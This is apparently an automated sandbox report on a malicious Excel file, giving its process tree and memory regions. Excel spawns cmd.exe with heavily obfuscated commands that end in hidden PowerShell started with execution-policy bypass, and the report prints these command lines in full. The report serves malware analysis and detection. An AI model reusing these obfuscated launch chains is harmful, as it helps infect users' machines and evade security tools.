4095b316...48ab | Grouped Behavior
VTI SCORE: 95/100
Dynamic Analysis Report
Classification: -

4095b31681f998c808b2e7338fa8adec82c9f5049df457c9f0c0fc562e2a48ab (SHA256)

Doc061120182038778905.xls

Excel Document

Created at 2018-11-06 10:22:00

Monitored Processes

Process Overview
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x8f8 Analysis Target Medium excel.exe "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -
#3 0xac0 Child Process Medium cmd.exe CMD.Exe /c ^F^o^r ; /^f ;; " tokens= +2 delims=FeH" , %^1,; iN , ( , ', , ^^f^^t^^Yp^^e ;^|;^^f^^IN^^d , ;, "SHCm" , , ; ' ; , ) , , ,^d^O ,%^1, ; ; ; pPuxarv^/^VC^s^v^4^0^b^l^b^kn^ ^ ^ , cw8f/^r ", ( , ; , ; ,( , ; , ;,;, (s^e^T^ ^ ^ ^ ^ ^+^~^}{=^e^o^2^8^P^G^C^7^y.Y^.^Y^e^o^2^v^T^d^]^F^3^p^b^f^6^K^'^.^Y^1^.^Y^@eo^2^h^8^P^Z^7^y8^P^3^p^T^d^e^3^7^{^j^Un^P^jy+^@^e^o^2^%^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^%^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^%^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^%^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^:^H^4^a^x^i^y+^F^3^p^bf^b^f^k^7^y^u^u^Qe^7P^jy^6K^1^{^m^6^G^C7y^%^z^w^L^h^P^j^y^8^ ^8^ 
z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^:^j^Unb^f^)-^3^Qe^AC^X^]^2^+2^1^F^3^p^b^f^b^f^k^7^y^u^uQ^e^G^C^7^y2^+2^G^C^7^y^'^6^w^L^.^Y^-^3^Q^e^A^C^6n^37^.Y^j^Un^5^)^)^}^2^+^2^}[^2^+2^e^2^+^2^w^L^Xb^1^2^+^2^{^jh^`^e^o2G^C7^y^2^+2^8^P^m^'^%^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^%^R^en^6^w^L^P^jy^{^7^y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^%^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^%z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^%R^en6w^L^P^j^y^{^7^y^jU^6^%^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^%^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^%^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^%^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^%^R^en^6^w^L^P^j^y^{^7^y^j^U6^%^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^%.^Y^.^Y^6^j^U^e/`^6^K^w^L^,^%^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^:^X^b^G^C7^y^)^'^7y6^T^d^vw^L^'^enF^3p^b^f^P^j^Q^e^wL7^y^j^U^6^X^m^u^Q^e^6n^jU^'^eq^F^3p^b^fN^7^y^P^j^Q^e^8^P^e^o^2^7^yj^U^6^R^Z^G^C^7^y^y^%^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^%^w^L^]^6^7^y^j^U^6^%^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^%^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^%e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ 
^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^%^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^:A^C^=^9^!) ; ; ; ) )&& ( , (, (^s^e^T ^ ^ ^ ^`^?=^!^\^,^}^_^:^e^o^2^=^s^!) , , ) ; ; )&&( , ( ; ; (S^e^T ^ ^@^[^~=!^`^?:^e^=^I^!) , ) , )&( , , , (^S^e^T ^ ^ ^ ^@^+^*=^!^@^[^~^:^.^=^g^!) , )&& ( (s^E^T ^ ^[^{=^!^@^+^*^:^8^P^=e^!), )& ( ; ; ; (^S^e^T ^ ^{^@^}=^!^[^{^:'^=.^!), , , )& ( ; (^s^E^t ^ ^\^{=^!^{^@^}^:^2^=^'^!) , )&& ( , ; , ( , ; , ; , (^s^E^T ^}^]^,^$=^!^\^{^:^a^=^W^!) , ) , , )&& (^s^e^T ^\^[=^!^}^]^,^$^:^6^=^a^!)&& ( ( ; ; ; (s^e^t ^ ^ ^`^]^$=^!^\^[^:^4^W^x^=^2^!) ) )&& ( , ; , ;, (^S^e^T ^ ^ ^`^-^$=!^`^]^$:bf=^6!) , ; , ; , )& ( ,(,;,; , (^s^ET ^ ^ [^$^@^+=^!^`^-^$^:^7^K^=^A^!) , ) , ;, )& ( , (^S^e^t ^@^-=^!^[^$^@^+:^3^p=^l^!) ; ; ; )& (^S^et ^ ^ ^ ^~^`^*^?=^!^@^-^:^:^=^*^!)&&( , , (^s^e^t ^#^;=^!^~^`^*^?^:^w^L^=^E^!) ,; , ; , )& ( ( , , (^s^e^T ^ ^*^{^[=^!^#^;:^ ^=^0^!) , ) )& (^s^et ^ ^@^#^?^.=^!^*^{^[^:^g^Y^=^ ^!)&( , ( , , (^S^E^T ^ ^'^}^_^-=^!^@^#^?^.^:^8^0^=^:^!) ; ; ) ) #1
#4 0xae0 Child Process Medium cmd.exe C:\Windows\system32\cmd.exe /c ^f^t^Yp^e | ^f^IN^d "SHCm" #3
#5 0xae8 Child Process Medium cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ftYpe " #4
#6 0xaf0 Child Process Medium find.exe fINd "SHCm" #4
#7 0xb04 Child Process Medium cmd.exe Cmd , ; ; ; pPuxarv/VCsv40blbkn , cw8f/r ", ( , ; , ; ,( , ; , ;,;, (s^e^T^ ^ ^ ^ ^ ^+^~^}{=^e^o^2^8^P^G^C^7^y.Y^.^Y^e^o^2^v^T^d^]^F^3^p^b^f^6^K^'^.^Y^1^.^Y^@eo^2^h^8^P^Z^7^y8^P^3^p^T^d^e^3^7^{^j^Un^P^jy+^@^e^o^2^%^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^%^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^%^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^%^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^:^H^4^a^x^i^y+^F^3^p^bf^b^f^k^7^y^u^u^Qe^7P^jy^6K^1^{^m^6^G^C7y^%^z^w^L^h^P^j^y^8^ ^8^ 
z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^:^j^Unb^f^)-^3^Qe^AC^X^]^2^+2^1^F^3^p^b^f^b^f^k^7^y^u^uQ^e^G^C^7^y2^+2^G^C^7^y^'^6^w^L^.^Y^-^3^Q^e^A^C^6n^37^.Y^j^Un^5^)^)^}^2^+^2^}[^2^+2^e^2^+^2^w^L^Xb^1^2^+^2^{^jh^`^e^o2G^C7^y^2^+2^8^P^m^'^%^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^%^R^en^6^w^L^P^jy^{^7^y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^%^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^%z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^%R^en6w^L^P^j^y^{^7^y^jU^6^%^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^%^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^%^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^%^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^%^R^en^6^w^L^P^j^y^{^7^y^j^U6^%^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^%.^Y^.^Y^6^j^U^e/`^6^K^w^L^,^%^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^:^X^b^G^C7^y^)^'^7y6^T^d^vw^L^'^enF^3p^b^f^P^j^Q^e^wL7^y^j^U^6^X^m^u^Q^e^6n^jU^'^eq^F^3p^b^fN^7^y^P^j^Q^e^8^P^e^o^2^7^yj^U^6^R^Z^G^C^7^y^y^%^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^%^w^L^]^6^7^y^j^U^6^%^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^%^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^%e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ 
^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^%^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^:A^C^=^9^!) ; ; ; ) )&& ( , (, (^s^e^T ^ ^ ^ ^`^?=^!^\^,^}^_^:^e^o^2^=^s^!) , , ) ; ; )&&( , ( ; ; (S^e^T ^ ^@^[^~=!^`^?:^e^=^I^!) , ) , )&( , , , (^S^e^T ^ ^ ^ ^@^+^*=^!^@^[^~^:^.^=^g^!) , )&& ( (s^E^T ^ ^[^{=^!^@^+^*^:^8^P^=e^!), )& ( ; ; ; (^S^e^T ^ ^{^@^}=^!^[^{^:'^=.^!), , , )& ( ; (^s^E^t ^ ^\^{=^!^{^@^}^:^2^=^'^!) , )&& ( , ; , ( , ; , ; , (^s^E^T ^}^]^,^$=^!^\^{^:^a^=^W^!) , ) , , )&& (^s^e^T ^\^[=^!^}^]^,^$^:^6^=^a^!)&& ( ( ; ; ; (s^e^t ^ ^ ^`^]^$=^!^\^[^:^4^W^x^=^2^!) ) )&& ( , ; , ;, (^S^e^T ^ ^ ^`^-^$=!^`^]^$:bf=^6!) , ; , ; , )& ( ,(,;,; , (^s^ET ^ ^ [^$^@^+=^!^`^-^$^:^7^K^=^A^!) , ) , ;, )& ( , (^S^e^t ^@^-=^!^[^$^@^+:^3^p=^l^!) ; ; ; )& (^S^et ^ ^ ^ ^~^`^*^?=^!^@^-^:^:^=^*^!)&&( , , (^s^e^t ^#^;=^!^~^`^*^?^:^w^L^=^E^!) ,; , ; , )& ( ( , , (^s^e^T ^ ^*^{^[=^!^#^;:^ ^=^0^!) , ) )& (^s^et ^ ^@^#^?^.=^!^*^{^[^:^g^Y^=^ ^!)&( , ( , , (^S^E^T ^ ^'^}^_^-=^!^@^#^?^.^:^8^0^=^:^!) ; ; ) )&&( , ( , (^s^e^t ^ ^ ^;^]=^!^'^}^_^-^:^j^U=^D^!) ) , )&( ; (^s^e^T ^ ^ ^`^\^+=^!^;^]^:^,^=^c^!) ; ; )&&( , ( , (S^e^T ^_^@^.^-=^!^`^\^+:^i^y^=^8^!) , , ) , , )&(^S^e^t ^ ^ ^ ^$^'=^ #3
#8 0xb24 Child Process Medium cmd.exe C:\Windows\system32\cmd.exe /c ^ft^Y^p^e | ^f^iN^d^S^t^r ^c^m #7
#9 0xb2c Child Process Medium cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ftYpe " #8
#10 0xb34 Child Process Medium findstr.exe fiNdStr cm #8
#11 0xb3c Child Process Medium cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echO ,%*[-,% " #7
#12 0xb44 Child Process Medium cmd.exe cmd ; #7
#13 0xb4c Child Process Medium cmd.exe cmd.exE /c %adizY% #12
#14 0xb54 Child Process Medium cmd.exe C:\Windows\system32\cmd.exe /S /D /c" EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) " #13
#15 0xb5c Child Process Medium powershell.exe POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc byPASS -nOPrOFIle -COmMANd &( $eNV:ComsPec[4,24,25]-JoIn'')($inpuT ) #13

Behavior Information - Grouped by Category

Process #1: excel.exe
1665 0
Information Value
ID #1
File Name c:\program files\microsoft office\root\office16\excel.exe
Command Line "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:16, Reason: Analysis Target
Unmonitor End Time: 00:04:57, Reason: Self Terminated
Monitor Duration 00:03:41
OS Process Information
Information Value
PID 0x8f8
Parent PID 0x39c (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A38
0x A34
0x A30
0x A2C
0x 9A0
0x 99C
0x 998
0x 968
0x 964
0x 960
0x 95C
0x 958
0x 954
0x 950
0x 94C
0x 948
0x 944
0x 940
0x 93C
0x 938
0x 918
0x 914
0x 910
0x 90C
0x 908
0x 904
0x 900
0x 8FC
0x A3C
0x A40
0x A44
0x A48
0x A4C
0x A58
0x A5C
0x A60
0x A90
0x A9C
0x B2C
0x 5FC
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x00020fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
locale.nls 0x00050000 0x000b6fff Memory Mapped File r False False False -
private_0x00000000000c0000 0x000c0000 0x000c0fff Private Memory rw True False False -
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory rw True False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e0fff Pagefile Backed Memory rw True False False -
pagefile_0x00000000000f0000 0x000f0000 0x000f6fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000100000 0x00100000 0x00101fff Pagefile Backed Memory rw True False False -
private_0x0000000000110000 0x00110000 0x00110fff Private Memory rw True False False -
private_0x0000000000120000 0x00120000 0x00120fff Private Memory rw True False False -
pagefile_0x0000000000130000 0x00130000 0x00132fff Pagefile Backed Memory r True False False -
private_0x0000000000140000 0x00140000 0x0014ffff Private Memory - True False False -
private_0x0000000000150000 0x00150000 0x0024ffff Private Memory rw True False False -
pagefile_0x0000000000250000 0x00250000 0x00252fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000260000 0x00260000 0x00262fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000270000 0x00270000 0x00272fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000280000 0x00280000 0x00282fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000290000 0x00290000 0x00292fff Pagefile Backed Memory r True False False -
pagefile_0x00000000002a0000 0x002a0000 0x002a1fff Pagefile Backed Memory r True False False -
pagefile_0x00000000002b0000 0x002b0000 0x002b1fff Pagefile Backed Memory r True False False -
private_0x00000000002c0000 0x002c0000 0x002c0fff Private Memory rw True False False -
pagefile_0x00000000002d0000 0x002d0000 0x002d0fff Pagefile Backed Memory r True False False -
private_0x00000000002e0000 0x002e0000 0x002effff Private Memory rw True False False -
private_0x00000000002f0000 0x002f0000 0x003effff Private Memory rw True False False -
private_0x00000000003f0000 0x003f0000 0x0042ffff Private Memory rw True False False -
private_0x0000000000430000 0x00430000 0x0052ffff Private Memory rw True False False -
pagefile_0x0000000000530000 0x00530000 0x006b7fff Pagefile Backed Memory r True False False -
pagefile_0x00000000006c0000 0x006c0000 0x00840fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000850000 0x00850000 0x01c4ffff Pagefile Backed Memory r True False False -
sortdefault.nls 0x01c50000 0x01f1efff Memory Mapped File r False False False -
pagefile_0x0000000001f20000 0x01f20000 0x02312fff Pagefile Backed Memory r True False False -
private_0x0000000002320000 0x02320000 0x0241ffff Private Memory rw True False False -
pagefile_0x0000000002420000 0x02420000 0x02424fff Pagefile Backed Memory rw True False False -
private_0x0000000002430000 0x02430000 0x0243ffff Private Memory rw True False False -
private_0x0000000002440000 0x02440000 0x0263ffff Private Memory rw True False False -
pagefile_0x0000000002640000 0x02640000 0x0271efff Pagefile Backed Memory r True False False -
pagefile_0x0000000002720000 0x02720000 0x02720fff Pagefile Backed Memory r True False False -
pagefile_0x0000000002730000 0x02730000 0x02730fff Pagefile Backed Memory r True False False -
pagefile_0x0000000002740000 0x02740000 0x02740fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000002750000 0x02750000 0x02751fff Pagefile Backed Memory r True False False -
index.dat 0x02760000 0x0276bfff Memory Mapped File rw True False False -
index.dat 0x02770000 0x02777fff Memory Mapped File rw True False False -
private_0x0000000002780000 0x02780000 0x027fffff Private Memory rw True False False -
private_0x0000000002800000 0x02800000 0x028fffff Private Memory rw True False False -
index.dat 0x02900000 0x0290ffff Memory Mapped File rw True False False -
pagefile_0x0000000002910000 0x02910000 0x02910fff Pagefile Backed Memory r True False False -
private_0x0000000002920000 0x02920000 0x02920fff Private Memory rw True False False -
pagefile_0x0000000002930000 0x02930000 0x02931fff Pagefile Backed Memory r True False False -
private_0x0000000002940000 0x02940000 0x02940fff Private Memory rw True False False -
private_0x0000000002950000 0x02950000 0x0295ffff Private Memory rw True False False -
private_0x0000000002960000 0x02960000 0x02a5ffff Private Memory rw True False False -
private_0x0000000002a60000 0x02a60000 0x02a60fff Private Memory rw True False False -
private_0x0000000002a70000 0x02a70000 0x02a70fff Private Memory rw True False False -
private_0x0000000002a80000 0x02a80000 0x02a80fff Private Memory rw True False False -
private_0x0000000002a90000 0x02a90000 0x02b8ffff Private Memory rw True False False -
xlintl32.dll 0x02b90000 0x03bd7fff Memory Mapped File r False False False -
private_0x0000000003be0000 0x03be0000 0x03be0fff Private Memory rw True False False -
pagefile_0x0000000003bf0000 0x03bf0000 0x03bf0fff Pagefile Backed Memory r True False False -
private_0x0000000003c00000 0x03c00000 0x03c01fff Private Memory rw True False False -
private_0x0000000003c10000 0x03c10000 0x03c10fff Private Memory rw True False False -
pagefile_0x0000000003c20000 0x03c20000 0x03c21fff Pagefile Backed Memory r True False False -
private_0x0000000003c30000 0x03c30000 0x03c31fff Private Memory rw True False False -
private_0x0000000003c40000 0x03c40000 0x03d3ffff Private Memory rw True False False -
private_0x0000000003d40000 0x03d40000 0x03d40fff Private Memory rw True False False -
pagefile_0x0000000003d50000 0x03d50000 0x03d51fff Pagefile Backed Memory r True False False -
private_0x0000000003d60000 0x03d60000 0x03e5ffff Private Memory rw True False False -
cversions.2.db 0x03e60000 0x03e63fff Memory Mapped File r True False False -
cversions.2.db 0x03e70000 0x03e73fff Memory Mapped File r True False False -
pagefile_0x0000000003e80000 0x03e80000 0x03e81fff Pagefile Backed Memory r True False False -
pagefile_0x0000000003e90000 0x03e90000 0x03e90fff Pagefile Backed Memory r True False False -
comdlg32.dll.mui 0x03ea0000 0x03eacfff Memory Mapped File rw False False False -
pagefile_0x0000000003eb0000 0x03eb0000 0x03eb1fff Pagefile Backed Memory r True False False -
private_0x0000000003ec0000 0x03ec0000 0x03fbffff Private Memory rw True False False -
pagefile_0x0000000003fc0000 0x03fc0000 0x03fc1fff Pagefile Backed Memory r True False False -
private_0x0000000003fd0000 0x03fd0000 0x040cffff Private Memory rw True False False -
private_0x00000000040d0000 0x040d0000 0x041cffff Private Memory rw True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db 0x041d0000 0x041fffff Memory Mapped File r True False False -
pagefile_0x0000000004200000 0x04200000 0x04201fff Pagefile Backed Memory r True False False -
pagefile_0x0000000004210000 0x04210000 0x04211fff Pagefile Backed Memory r True False False -
private_0x0000000004220000 0x04220000 0x04222fff Private Memory rw True False False -
